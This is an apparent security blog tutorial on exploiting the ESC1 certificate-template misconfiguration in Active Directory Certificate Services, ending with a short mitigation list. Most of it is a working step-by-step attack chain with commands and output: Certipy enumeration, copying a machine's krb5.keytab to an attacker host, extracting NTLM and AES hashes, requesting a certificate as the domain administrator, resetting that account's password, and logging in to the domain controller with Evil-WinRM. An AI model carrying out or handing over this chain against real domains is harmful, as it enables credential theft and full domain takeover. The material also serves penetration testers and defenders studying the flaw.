Exploiting ESC1 Vulnerable Certificates for Privilege Escalation in Active Directory

Introduction

Active Directory Certificate Services (AD CS) is a critical infrastructure component in many organizations, providing certificates that enable secure communication, authentication, and encryption. While AD CS can enhance security, it also introduces risks when not properly configured. One such risk is ESC1 (Enterprise Security Certificate 1), a vulnerability that arises from misconfigured certificate templates.

In this article, the ESC1 vulnerability is explored in detail, including its root cause, the exploitation process, and mitigation strategies. The goal is to provide both an educational and practical guide for security professionals seeking to understand and address this critical issue.

What Is ESC1?

ESC1 is a vulnerability that results from overly permissive configurations in certificate templates. Certificate templates dictate who can enroll for certificates, the attributes of issued certificates, and the intended purposes (e.g., authentication or encryption). A template becomes vulnerable to ESC1 if the following conditions are met:

  1. Excessive Enrollment Permissions: Low-privileged groups, such as Domain Computers, have permission to enroll for certificates.
  2. Enrollee Supplies Subject: The template allows the requester to specify the subject of the certificate (e.g., username or email). This enables attackers to impersonate other users, including privileged accounts.
  3. Client Authentication Allowed: The template supports client authentication, meaning the issued certificate can be used to authenticate users or devices in the domain.

When these conditions are present, an attacker can abuse the template to request a certificate for a privileged account, such as the domain administrator, effectively impersonating that account and gaining elevated privileges.

Why Is ESC1 Dangerous?

A certificate is a powerful authentication mechanism in Active Directory. When an attacker exploits ESC1, they can obtain a certificate that allows them to:

  • Authenticate as a high-privileged account (e.g., domain administrator).
  • Access sensitive resources and systems within the domain.
  • Persist within the network without relying on traditional credentials.

Unlike password hashes, certificates are less likely to trigger alerts in security monitoring systems, making ESC1 an attractive option for stealthy attackers.

Exploiting ESC1: A Step-by-Step Guide

The following sections outline how to exploit ESC1 in a practical scenario. All sensitive information, such as usernames, IP addresses, and hostnames, has been anonymized.

Step 1: Enumerating Certificate Templates

The first step is to identify certificate templates within the domain and check for potential vulnerabilities. This is accomplished using Certipy-AD, a tool designed for auditing and exploiting AD CS.

The following command enumerates certificate templates and highlights vulnerabilities:

$ sudo certipy-ad find -u alice.williams -p 'P@ssw0rd123!' -dc-ip 192.168.50.10 -vulnerable -enabled -hide-admins -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'EXAMPLE-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'EXAMPLE-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'EXAMPLE-DC01-CA' via RRP
[*] Got CA configuration for 'EXAMPLE-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : EXAMPLE-DC01-CA
    DNS Name                            : dc01.example.local
    Certificate Subject                 : CN=EXAMPLE-DC01-CA, DC=example, DC=local
    Certificate Serial Number           : 1DCECF70B23E09A84E7596415726E2CB
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2124-11-25 20:24:34+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Access Rights
        Enroll                          : EXAMPLE.LOCAL\Authenticated Users
Certificate Templates
  0
    Template Name                       : SecureComputers
    Display Name                        : SecureComputers
    Certificate Authorities             : EXAMPLE-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : EXAMPLE.LOCAL\Domain Computers
    [!] Vulnerabilities
      ESC1                              : 'EXAMPLE.LOCAL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

In this example, the SecureComputers template is vulnerable to ESC1 because Domain Computers can enroll, the subject can be defined by the requester, and client authentication is enabled. These conditions allow the attacker to impersonate other accounts, including privileged ones.

Step 2: Obtaining Kerberos Credentials

To request a certificate, privileged access is required. If the current account does not have sufficient privileges, Kerberos credentials from a compromised domain-joined machine can be leveraged.

The krb5.keytab file on the compromised machine contains encrypted Kerberos authentication material. It can be copied and transferred to the attacker's machine:

# On the compromised machine
$ cp /etc/krb5.keytab /tmp/krb5.keytab
$ chmod 777 /tmp/krb5.keytab

# Transfer the file to the attacker's machine
$ scp alice.williams@example.local@mail01.example.local:/tmp/krb5.keytab ./krb5.keytab

The krb5.keytab file is then analyzed using KeyTabExtract to extract Kerberos hashes:

$ python3 keytabextract.py krb5.keytab

[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM: EXAMPLE.LOCAL
    SERVICE PRINCIPAL: MAIL01$/
    NTLM HASH: abc123def4567890abc123def4567890
    AES-256 HASH: abc456def1237890abc456def1237890
    AES-128 HASH: def123abc4567890def123abc4567890

These hashes are sufficient to authenticate as the service principal.

Step 3: Requesting a Certificate

With the extracted Kerberos credentials, the next step is to request a certificate using the vulnerable template. Certipy can be used for this purpose:

$ sudo certipy-ad req -dc-ip 192.168.50.10 \
    -ca EXAMPLE-DC01-CA \
    -target EXAMPLE.LOCAL \
    -template SecureComputers \
    -upn administrator@example.local \
    -dns dc01.example.local \
    -u MAIL01$@EXAMPLE.LOCAL \
    -hashes abc123def4567890abc123def4567890 \
    -key-size 4096

[*] Successfully requested certificate
[*] Saved certificate and private key to 'administrator_dc01.pfx'

This command requests a certificate for the administrator@example.local account using the SecureComputers template.

Step 4: Privilege Escalation

The certificate obtained in the previous step can now be used to authenticate as the domain administrator. Certipy provides an interactive LDAP shell for manipulating Active Directory objects:

$ sudo certipy-ad auth -pfx administrator_dc01.pfx -username Administrator -domain EXAMPLE.LOCAL -dc-ip 192.168.50.10 -ldap-shell

[*] Connecting to 'ldaps://192.168.50.10:636'
[*] Authenticated to '192.168.50.10' as: u:EXAMPLE\Administrator
Type help for list of commands

# change_password Administrator NewPassword123!
Password changed successfully!

By changing the domain administrator’s password, full control over the domain is achieved.

Step 5: Accessing the Domain Controller

With the new credentials, access to the Domain Controller is obtained using tools like Evil-WinRM:

$ evil-winrm -i 192.168.50.10 -u Administrator -p 'NewPassword123!'

*Evil-WinRM* PS C:\Users\Administrator\Desktop>

This confirms that the domain has been successfully compromised.

Mitigation Strategies

To protect against ESC1, organizations should adopt the following practices:

  1. Restrict Enrollment Permissions: Limit access to certificate templates to trusted users and groups. Avoid granting enrollment permissions to Domain Computers.
  2. Disable "Enrollee Supplies Subject": Prevent users from specifying the subject field in certificates to eliminate impersonation risks.
  3. Regularly Audit AD CS Configurations: Use tools like Certipy or BloodHound to identify misconfigurations and vulnerabilities in certificate templates.
  4. Enable Monitoring: Implement monitoring for unusual certificate enrollment activity, especially for privileged accounts.
  5. Apply Security Updates: Ensure that AD CS and related systems are up to date with the latest patches.

Conclusion

The ESC1 vulnerability highlights the importance of secure configurations in Active Directory environments. By understanding how this vulnerability is exploited and implementing best practices for mitigation, organizations can significantly reduce their attack surface. Regular audits, monitoring, and a proactive security posture are essential for safeguarding critical infrastructure like AD CS.